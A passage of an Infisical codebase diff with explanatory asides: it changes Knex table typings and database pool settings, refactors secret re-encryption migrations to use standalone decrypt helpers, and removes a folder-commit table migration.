    [TableName.SecretApprovalRequest]: KnexOriginal.CompositeTableType<
      TSecretApprovalRequests,
      TSecretApprovalRequestsInsert,

@ -1156,60 +1090,5 @@ declare module "knex/types/tables" {
      TGithubOrgSyncConfigsInsert,
      TGithubOrgSyncConfigsUpdate
    >;
    [TableName.FolderCommit]: KnexOriginal.CompositeTableType<
      TFolderCommits,
      TFolderCommitsInsert,
      TFolderCommitsUpdate
    >;
    [TableName.FolderCommitChanges]: KnexOriginal.CompositeTableType<
      TFolderCommitChanges,
      TFolderCommitChangesInsert,
      TFolderCommitChangesUpdate
    >;
    [TableName.FolderCheckpoint]: KnexOriginal.CompositeTableType<
      TFolderCheckpoints,
      TFolderCheckpointsInsert,
      TFolderCheckpointsUpdate
    >;
    [TableName.FolderCheckpointResources]: KnexOriginal.CompositeTableType<
      TFolderCheckpointResources,
      TFolderCheckpointResourcesInsert,
      TFolderCheckpointResourcesUpdate
    >;
    [TableName.FolderTreeCheckpoint]: KnexOriginal.CompositeTableType<
      TFolderTreeCheckpoints,
      TFolderTreeCheckpointsInsert,
      TFolderTreeCheckpointsUpdate
    >;
    [TableName.FolderTreeCheckpointResources]: KnexOriginal.CompositeTableType<
      TFolderTreeCheckpointResources,
      TFolderTreeCheckpointResourcesInsert,
      TFolderTreeCheckpointResourcesUpdate
    >;
    [TableName.SecretScanningDataSource]: KnexOriginal.CompositeTableType<
      TSecretScanningDataSources,
      TSecretScanningDataSourcesInsert,
      TSecretScanningDataSourcesUpdate
    >;
    [TableName.SecretScanningResource]: KnexOriginal.CompositeTableType<
      TSecretScanningResources,
      TSecretScanningResourcesInsert,
      TSecretScanningResourcesUpdate
    >;
    [TableName.SecretScanningScan]: KnexOriginal.CompositeTableType<
      TSecretScanningScans,
      TSecretScanningScansInsert,
      TSecretScanningScansUpdate
    >;
    [TableName.SecretScanningFinding]: KnexOriginal.CompositeTableType<
      TSecretScanningFindings,
      TSecretScanningFindingsInsert,
      TSecretScanningFindingsUpdate
    >;
    [TableName.SecretScanningConfig]: KnexOriginal.CompositeTableType<
      TSecretScanningConfigs,
      TSecretScanningConfigsInsert,
      TSecretScanningConfigsUpdate
    >;
  }
}
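
A quick aside on the type machinery being removed here: Knex's `CompositeTableType` lets each table declare distinct select, insert, and update shapes, which is why every table above has a `T...`, `T...Insert`, and `T...Update` triple. A self-contained sketch of the pattern (the `users` table and its columns are illustrative, not from this diff):

import { knex, Knex } from "knex";

interface TUsers { id: string; email: string; createdAt: Date; }
type TUsersInsert = Omit<TUsers, "id" | "createdAt">; // the DB generates these
type TUsersUpdate = Partial<TUsersInsert>;

declare module "knex/types/tables" {
  interface Tables {
    users: Knex.CompositeTableType<TUsers, TUsersInsert, TUsersUpdate>;
  }
}

const db = knex({ client: "pg" });
// db("users").insert({ email: "a@b.c" }) now type-checks against TUsersInsert,
// while db("users").select("*") resolves to TUsers rows.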

@ -1,6 +1,6 @@
import knex, { Knex } from "knex";

export type TDbClient = Knex;
export type TDbClient = ReturnType<typeof initDbConnection>;
export const initDbConnection = ({
  dbConnectionUri,
  dbRootCert,

@ -50,8 +50,6 @@ export const initDbConnection = ({
      }
    : false
  },
  // https://knexjs.org/guide/#pool
  pool: { min: 0, max: 10 },
  migrations: {
    tableName: "infisical_migrations"
  }

@ -72,8 +70,7 @@ export const initDbConnection = ({
      },
      migrations: {
        tableName: "infisical_migrations"
      },
      pool: { min: 0, max: 10 }
    }
  });
});

@ -110,8 +107,7 @@ export const initAuditLogDbConnection = ({
      },
      migrations: {
        tableName: "infisical_migrations"
      },
      pool: { min: 0, max: 10 }
    }
  });

// we add these overrides so that auditLogDb and the primary DB are interchangeable
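
The first hunk above carries the substantive change: `TDbClient` stops being a bare `Knex` and becomes the factory's return type, so anything `initDbConnection` attaches to the client also survives in the type. A minimal sketch of why that matters (the `replicaNode` helper is illustrative, not from this diff):

import knex, { Knex } from "knex";

export const initDbConnection = ({ dbConnectionUri }: { dbConnectionUri: string }) => {
  const db = knex({
    client: "pg",
    connection: dbConnectionUri,
    pool: { min: 0, max: 10 }
  });
  // attach an extra helper to the client...
  const extended = Object.assign(db, { replicaNode: (): Knex => db });
  return extended;
};

// ...ReturnType keeps `replicaNode` visible to every caller;
// a plain `Knex` annotation would erase it
export type TDbClient = ReturnType<typeof initDbConnection>;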

@ -4,7 +4,6 @@ import "ts-node/register";
import dotenv from "dotenv";
import type { Knex } from "knex";
import path from "path";
import { initLogger } from "@app/lib/logger";

// Update with your config settings.
dotenv.config({

@ -14,8 +13,6 @@ dotenv.config({
  path: path.join(__dirname, "../../../.env")
});

initLogger();

export default {
  development: {
    client: "postgres",
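
For orientation, the file in this hunk is the Knex CLI config: `ts-node/register` is what lets the CLI execute TypeScript migrations directly, and `dotenv` points it at the repo's `.env`. A pared-down knexfile in the same shape (connection value is a placeholder):

import "ts-node/register"; // lets the knex CLI run .ts migration files
import type { Knex } from "knex";

const config: Record<string, Knex.Config> = {
  development: {
    client: "postgres",
    connection: process.env.DB_CONNECTION_URI,
    migrations: {
      tableName: "infisical_migrations",
      extension: "ts"
    }
  }
};

export default config;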

@ -1,10 +1,9 @@
import { Knex } from "knex";

import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto } from "@app/lib/crypto/cryptography";
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";

@ -27,12 +26,9 @@ export async function up(knex: Knex): Promise<void> {
  }

  initLogger();
  const superAdminDAL = superAdminDALFactory(knex);
  const envConfig = await getMigrationEnvConfig(superAdminDAL);

  const envConfig = getMigrationEnvConfig();
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });

  const projectEncryptionRingBuffer =
    createCircularCache<Awaited<ReturnType<(typeof kmsService)["createCipherPairWithDataKey"]>>>(25);
  const webhooks = await knex(TableName.Webhook)

@ -69,15 +65,12 @@ export async function up(knex: Knex): Promise<void> {

  let encryptedSecretKey = null;
  if (el.encryptedSecretKey && el.iv && el.tag && el.keyEncoding) {
    const decyptedSecretKey = crypto
      .encryption()
      .symmetric()
      .decryptWithRootEncryptionKey({
        keyEncoding: el.keyEncoding as SecretKeyEncoding,
        iv: el.iv,
        tag: el.tag,
        ciphertext: el.encryptedSecretKey
      });
    const decyptedSecretKey = infisicalSymmetricDecrypt({
      keyEncoding: el.keyEncoding as SecretKeyEncoding,
      iv: el.iv,
      tag: el.tag,
      ciphertext: el.encryptedSecretKey
    });
    encryptedSecretKey = projectKmsService.encryptor({
      plainText: Buffer.from(decyptedSecretKey, "utf8")
    }).cipherTextBlob;

@ -85,15 +78,12 @@ export async function up(knex: Knex): Promise<void> {

  const decryptedUrl =
    el.urlIV && el.urlTag && el.urlCipherText && el.keyEncoding
      ? crypto
          .encryption()
          .symmetric()
          .decryptWithRootEncryptionKey({
            keyEncoding: el.keyEncoding as SecretKeyEncoding,
            iv: el.urlIV,
            tag: el.urlTag,
            ciphertext: el.urlCipherText
          })
      ? infisicalSymmetricDecrypt({
          keyEncoding: el.keyEncoding as SecretKeyEncoding,
          iv: el.urlIV,
          tag: el.urlTag,
          ciphertext: el.urlCipherText
        })
      : null;

  const encryptedUrl = projectKmsService.encryptor({
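
The refactor in this and the following migrations is mechanical (the fluent `crypto.encryption().symmetric().decryptWithRootEncryptionKey` call becomes the standalone `infisicalSymmetricDecrypt` helper), but the surrounding logic is the interesting part: decrypt each value under the legacy root-key scheme, then re-encrypt it under the project's KMS data key, caching one cipher pair per project in a small ring buffer. A hedged sketch of that loop (`createCircularCache`, `KmsDataKey`, and the KMS calls appear in the diff itself; the cache's `getItem` method and the exact arguments of `createCipherPairWithDataKey` are assumptions):

const projectEncryptionRingBuffer =
  createCircularCache<Awaited<ReturnType<(typeof kmsService)["createCipherPairWithDataKey"]>>>(25);

for (const el of rows) {
  let projectKmsService = projectEncryptionRingBuffer.getItem(el.projectId); // assumed API
  if (!projectKmsService) {
    projectKmsService = await kmsService.createCipherPairWithDataKey({
      type: KmsDataKey.SecretManager,
      projectId: el.projectId
    });
    projectEncryptionRingBuffer.push(el.projectId, projectKmsService);
  }

  // 1) decrypt with the legacy root-key scheme
  const plaintext = infisicalSymmetricDecrypt({
    keyEncoding: el.keyEncoding as SecretKeyEncoding,
    iv: el.iv,
    tag: el.tag,
    ciphertext: el.encryptedSecretKey
  });

  // 2) re-encrypt under the project KMS key (write-back omitted)
  const { cipherTextBlob } = projectKmsService.encryptor({
    plainText: Buffer.from(plaintext, "utf8")
  });
}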

@ -1,11 +1,10 @@
import { Knex } from "knex";

import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto } from "@app/lib/crypto/cryptography";
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";

@ -30,9 +29,7 @@ export async function up(knex: Knex): Promise<void> {
  }

  initLogger();
  const superAdminDAL = superAdminDALFactory(knex);
  const envConfig = await getMigrationEnvConfig(superAdminDAL);

  const envConfig = getMigrationEnvConfig();
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const projectEncryptionRingBuffer =

@ -63,23 +60,20 @@ export async function up(knex: Knex): Promise<void> {
  // eslint-disable-next-line @typescript-eslint/ban-ts-comment
  // @ts-ignore This will be removed in next cycle so ignore the ts missing error
  el.inputIV && el.inputTag && el.inputCiphertext && el.keyEncoding
    ? crypto
        .encryption()
        .symmetric()
        .decryptWithRootEncryptionKey({
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          keyEncoding: el.keyEncoding as SecretKeyEncoding,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.inputIV,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          tag: el.inputTag,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          ciphertext: el.inputCiphertext
        })
    ? infisicalSymmetricDecrypt({
        // eslint-disable-next-line @typescript-eslint/ban-ts-comment
        // @ts-ignore This will be removed in next cycle so ignore the ts missing error
        keyEncoding: el.keyEncoding as SecretKeyEncoding,
        // eslint-disable-next-line @typescript-eslint/ban-ts-comment
        // @ts-ignore This will be removed in next cycle so ignore the ts missing error
        iv: el.inputIV,
        // eslint-disable-next-line @typescript-eslint/ban-ts-comment
        // @ts-ignore This will be removed in next cycle so ignore the ts missing error
        tag: el.inputTag,
        // eslint-disable-next-line @typescript-eslint/ban-ts-comment
        // @ts-ignore This will be removed in next cycle so ignore the ts missing error
        ciphertext: el.inputCiphertext
      })
    : "";

  const encryptedInput = projectKmsService.encryptor({

@ -1,11 +1,10 @@
import { Knex } from "knex";

import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto } from "@app/lib/crypto/cryptography";
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";

@ -24,9 +23,7 @@ export async function up(knex: Knex): Promise<void> {
  }

  initLogger();
  const superAdminDAL = superAdminDALFactory(knex);
  const envConfig = await getMigrationEnvConfig(superAdminDAL);

  const envConfig = getMigrationEnvConfig();
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const projectEncryptionRingBuffer =

@ -56,23 +53,20 @@ export async function up(knex: Knex): Promise<void> {
  // eslint-disable-next-line @typescript-eslint/ban-ts-comment
  // @ts-ignore This will be removed in next cycle so ignore the ts missing error
  el.encryptedDataTag && el.encryptedDataIV && el.encryptedData && el.keyEncoding
    ? crypto
        .encryption()
        .symmetric()
        .decryptWithRootEncryptionKey({
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          keyEncoding: el.keyEncoding as SecretKeyEncoding,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.encryptedDataIV,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          tag: el.encryptedDataTag,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          ciphertext: el.encryptedData
        })
    ? infisicalSymmetricDecrypt({
        // eslint-disable-next-line @typescript-eslint/ban-ts-comment
        // @ts-ignore This will be removed in next cycle so ignore the ts missing error
        keyEncoding: el.keyEncoding as SecretKeyEncoding,
        // eslint-disable-next-line @typescript-eslint/ban-ts-comment
        // @ts-ignore This will be removed in next cycle so ignore the ts missing error
        iv: el.encryptedDataIV,
        // eslint-disable-next-line @typescript-eslint/ban-ts-comment
        // @ts-ignore This will be removed in next cycle so ignore the ts missing error
        tag: el.encryptedDataTag,
        // eslint-disable-next-line @typescript-eslint/ban-ts-comment
        // @ts-ignore This will be removed in next cycle so ignore the ts missing error
        ciphertext: el.encryptedData
      })
    : "";

  const encryptedRotationData = projectKmsService.encryptor({

@ -1,11 +1,10 @@
import { Knex } from "knex";

import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";

@ -55,9 +54,7 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
  }

  initLogger();
  const superAdminDAL = superAdminDALFactory(knex);
  const envConfig = await getMigrationEnvConfig(superAdminDAL);

  const envConfig = getMigrationEnvConfig();
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const orgEncryptionRingBuffer =

@ -102,23 +99,19 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
    orgEncryptionRingBuffer.push(orgId, orgKmsService);
  }

  const key = crypto
    .encryption()
    .symmetric()
    .decryptWithRootEncryptionKey({
      ciphertext: encryptedSymmetricKey,
      iv: symmetricKeyIV,
      tag: symmetricKeyTag,
      keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
    });
  const key = infisicalSymmetricDecrypt({
    ciphertext: encryptedSymmetricKey,
    iv: symmetricKeyIV,
    tag: symmetricKeyTag,
    keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
  });

  const decryptedTokenReviewerJwt =
    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
    // @ts-ignore This will be removed in next cycle so ignore the ts missing error
    el.encryptedTokenReviewerJwt && el.tokenReviewerJwtIV && el.tokenReviewerJwtTag
      ? crypto.encryption().symmetric().decrypt({
      ? decryptSymmetric({
          key,
          keySize: SymmetricKeySize.Bits256,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.tokenReviewerJwtIV,

@ -135,9 +128,8 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
    // @ts-ignore This will be removed in next cycle so ignore the ts missing error
    el.encryptedCaCert && el.caCertIV && el.caCertTag
      ? crypto.encryption().symmetric().decrypt({
      ? decryptSymmetric({
          key,
          keySize: SymmetricKeySize.Bits256,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.caCertIV,
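
The identity-auth migrations above all share a two-step unwrap: the instance root key decrypts the org's symmetric key, and that key then decrypts the individual columns. Condensed, with every name taken from the diff itself:

// step 1: the root key unwraps the per-org symmetric key
const key = infisicalSymmetricDecrypt({
  ciphertext: encryptedSymmetricKey,
  iv: symmetricKeyIV,
  tag: symmetricKeyTag,
  keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});

// step 2: the org key opens each field, e.g. the CA certificate
const caCert = decryptSymmetric({
  key,
  keySize: SymmetricKeySize.Bits256,
  iv: el.caCertIV,
  tag: el.caCertTag,
  ciphertext: el.encryptedCaCert
});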

@ -1,11 +1,10 @@
import { Knex } from "knex";

import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";

@ -35,9 +34,7 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
  }

  initLogger();
  const superAdminDAL = superAdminDALFactory(knex);
  const envConfig = await getMigrationEnvConfig(superAdminDAL);

  const envConfig = getMigrationEnvConfig();
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const orgEncryptionRingBuffer =

@ -74,24 +71,19 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
    );
    orgEncryptionRingBuffer.push(orgId, orgKmsService);
  }

  const key = crypto
    .encryption()
    .symmetric()
    .decryptWithRootEncryptionKey({
      ciphertext: encryptedSymmetricKey,
      iv: symmetricKeyIV,
      tag: symmetricKeyTag,
      keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
    });
  const key = infisicalSymmetricDecrypt({
    ciphertext: encryptedSymmetricKey,
    iv: symmetricKeyIV,
    tag: symmetricKeyTag,
    keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
  });

  const decryptedCertificate =
    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
    // @ts-ignore This will be removed in next cycle so ignore the ts missing error
    el.encryptedCaCert && el.caCertIV && el.caCertTag
      ? crypto.encryption().symmetric().decrypt({
      ? decryptSymmetric({
          key,
          keySize: SymmetricKeySize.Bits256,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.caCertIV,

@ -1,11 +1,10 @@
import { Knex } from "knex";

import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";

@ -28,8 +27,7 @@ const reencryptSamlConfig = async (knex: Knex) => {
  }

  initLogger();
  const superAdminDAL = superAdminDALFactory(knex);
  const envConfig = await getMigrationEnvConfig(superAdminDAL);
  const envConfig = getMigrationEnvConfig();
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const orgEncryptionRingBuffer =

@ -60,24 +58,19 @@ const reencryptSamlConfig = async (knex: Knex) => {
    );
    orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
  }

  const key = crypto
    .encryption()
    .symmetric()
    .decryptWithRootEncryptionKey({
      ciphertext: encryptedSymmetricKey,
      iv: symmetricKeyIV,
      tag: symmetricKeyTag,
      keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
    });
  const key = infisicalSymmetricDecrypt({
    ciphertext: encryptedSymmetricKey,
    iv: symmetricKeyIV,
    tag: symmetricKeyTag,
    keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
  });

  const decryptedEntryPoint =
    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
    // @ts-ignore This will be removed in next cycle so ignore the ts missing error
    el.encryptedEntryPoint && el.entryPointIV && el.entryPointTag
      ? crypto.encryption().symmetric().decrypt({
      ? decryptSymmetric({
          key,
          keySize: SymmetricKeySize.Bits256,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.entryPointIV,

@ -94,9 +87,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
    // @ts-ignore This will be removed in next cycle so ignore the ts missing error
    el.encryptedIssuer && el.issuerIV && el.issuerTag
      ? crypto.encryption().symmetric().decrypt({
      ? decryptSymmetric({
          key,
          keySize: SymmetricKeySize.Bits256,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.issuerIV,

@ -113,9 +105,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
    // @ts-ignore This will be removed in next cycle so ignore the ts missing error
    el.encryptedCert && el.certIV && el.certTag
      ? crypto.encryption().symmetric().decrypt({
      ? decryptSymmetric({
          key,
          keySize: SymmetricKeySize.Bits256,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.certIV,

@ -194,8 +185,7 @@ const reencryptLdapConfig = async (knex: Knex) => {
  }

  initLogger();
  const superAdminDAL = superAdminDALFactory(knex);
  const envConfig = await getMigrationEnvConfig(superAdminDAL);
  const envConfig = getMigrationEnvConfig();
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const orgEncryptionRingBuffer =

@ -226,24 +216,19 @@ const reencryptLdapConfig = async (knex: Knex) => {
    );
    orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
  }

  const key = crypto
    .encryption()
    .symmetric()
    .decryptWithRootEncryptionKey({
      ciphertext: encryptedSymmetricKey,
      iv: symmetricKeyIV,
      tag: symmetricKeyTag,
      keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
    });
  const key = infisicalSymmetricDecrypt({
    ciphertext: encryptedSymmetricKey,
    iv: symmetricKeyIV,
    tag: symmetricKeyTag,
    keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
  });

  const decryptedBindDN =
    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
    // @ts-ignore This will be removed in next cycle so ignore the ts missing error
    el.encryptedBindDN && el.bindDNIV && el.bindDNTag
      ? crypto.encryption().symmetric().decrypt({
      ? decryptSymmetric({
          key,
          keySize: SymmetricKeySize.Bits256,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.bindDNIV,

@ -260,9 +245,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
    // @ts-ignore This will be removed in next cycle so ignore the ts missing error
    el.encryptedBindPass && el.bindPassIV && el.bindPassTag
      ? crypto.encryption().symmetric().decrypt({
      ? decryptSymmetric({
          key,
          keySize: SymmetricKeySize.Bits256,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.bindPassIV,

@ -279,9 +263,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
    // @ts-ignore This will be removed in next cycle so ignore the ts missing error
    el.encryptedCACert && el.caCertIV && el.caCertTag
      ? crypto.encryption().symmetric().decrypt({
      ? decryptSymmetric({
          key,
          keySize: SymmetricKeySize.Bits256,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.caCertIV,

@ -354,8 +337,7 @@ const reencryptOidcConfig = async (knex: Knex) => {
  }

  initLogger();
  const superAdminDAL = superAdminDALFactory(knex);
  const envConfig = await getMigrationEnvConfig(superAdminDAL);
  const envConfig = getMigrationEnvConfig();
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const orgEncryptionRingBuffer =

@ -386,24 +368,19 @@ const reencryptOidcConfig = async (knex: Knex) => {
    );
    orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
  }

  const key = crypto
    .encryption()
    .symmetric()
    .decryptWithRootEncryptionKey({
      ciphertext: encryptedSymmetricKey,
      iv: symmetricKeyIV,
      tag: symmetricKeyTag,
      keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
    });
  const key = infisicalSymmetricDecrypt({
    ciphertext: encryptedSymmetricKey,
    iv: symmetricKeyIV,
    tag: symmetricKeyTag,
    keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
  });

  const decryptedClientId =
    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
    // @ts-ignore This will be removed in next cycle so ignore the ts missing error
    el.encryptedClientId && el.clientIdIV && el.clientIdTag
      ? crypto.encryption().symmetric().decrypt({
      ? decryptSymmetric({
          key,
          keySize: SymmetricKeySize.Bits256,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.clientIdIV,

@ -420,9 +397,8 @@ const reencryptOidcConfig = async (knex: Knex) => {
    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
    // @ts-ignore This will be removed in next cycle so ignore the ts missing error
    el.encryptedClientSecret && el.clientSecretIV && el.clientSecretTag
      ? crypto.encryption().symmetric().decrypt({
      ? decryptSymmetric({
          key,
          keySize: SymmetricKeySize.Bits256,
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          iv: el.clientSecretIV,

@ -1,166 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";

export async function up(knex: Knex): Promise<void> {
  const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
  if (!hasFolderCommitTable) {
    await knex.schema.createTable(TableName.FolderCommit, (t) => {
      t.uuid("id").primary().defaultTo(knex.fn.uuid());
      t.bigIncrements("commitId");
      t.jsonb("actorMetadata").notNullable();
      t.string("actorType").notNullable();
      t.string("message");
      t.uuid("folderId").notNullable();
      t.uuid("envId").notNullable();
      t.foreign("envId").references("id").inTable(TableName.Environment).onDelete("CASCADE");
      t.timestamps(true, true, true);

      t.index("folderId");
      t.index("envId");
    });
  }

  const hasFolderCommitChangesTable = await knex.schema.hasTable(TableName.FolderCommitChanges);
  if (!hasFolderCommitChangesTable) {
    await knex.schema.createTable(TableName.FolderCommitChanges, (t) => {
      t.uuid("id").primary().defaultTo(knex.fn.uuid());
      t.uuid("folderCommitId").notNullable();
      t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
      t.string("changeType").notNullable();
      t.boolean("isUpdate").notNullable().defaultTo(false);
      t.uuid("secretVersionId");
      t.foreign("secretVersionId").references("id").inTable(TableName.SecretVersionV2).onDelete("CASCADE");
      t.uuid("folderVersionId");
      t.foreign("folderVersionId").references("id").inTable(TableName.SecretFolderVersion).onDelete("CASCADE");
      t.timestamps(true, true, true);

      t.index("folderCommitId");
      t.index("secretVersionId");
      t.index("folderVersionId");
    });
  }

  const hasFolderCheckpointTable = await knex.schema.hasTable(TableName.FolderCheckpoint);
  if (!hasFolderCheckpointTable) {
    await knex.schema.createTable(TableName.FolderCheckpoint, (t) => {
      t.uuid("id").primary().defaultTo(knex.fn.uuid());
      t.uuid("folderCommitId").notNullable();
      t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
      t.timestamps(true, true, true);

      t.index("folderCommitId");
    });
  }

  const hasFolderCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderCheckpointResources);
  if (!hasFolderCheckpointResourcesTable) {
    await knex.schema.createTable(TableName.FolderCheckpointResources, (t) => {
      t.uuid("id").primary().defaultTo(knex.fn.uuid());
      t.uuid("folderCheckpointId").notNullable();
      t.foreign("folderCheckpointId").references("id").inTable(TableName.FolderCheckpoint).onDelete("CASCADE");
      t.uuid("secretVersionId");
      t.foreign("secretVersionId").references("id").inTable(TableName.SecretVersionV2).onDelete("CASCADE");
      t.uuid("folderVersionId");
      t.foreign("folderVersionId").references("id").inTable(TableName.SecretFolderVersion).onDelete("CASCADE");
      t.timestamps(true, true, true);

      t.index("folderCheckpointId");
      t.index("secretVersionId");
      t.index("folderVersionId");
    });
  }

  const hasFolderTreeCheckpointTable = await knex.schema.hasTable(TableName.FolderTreeCheckpoint);
  if (!hasFolderTreeCheckpointTable) {
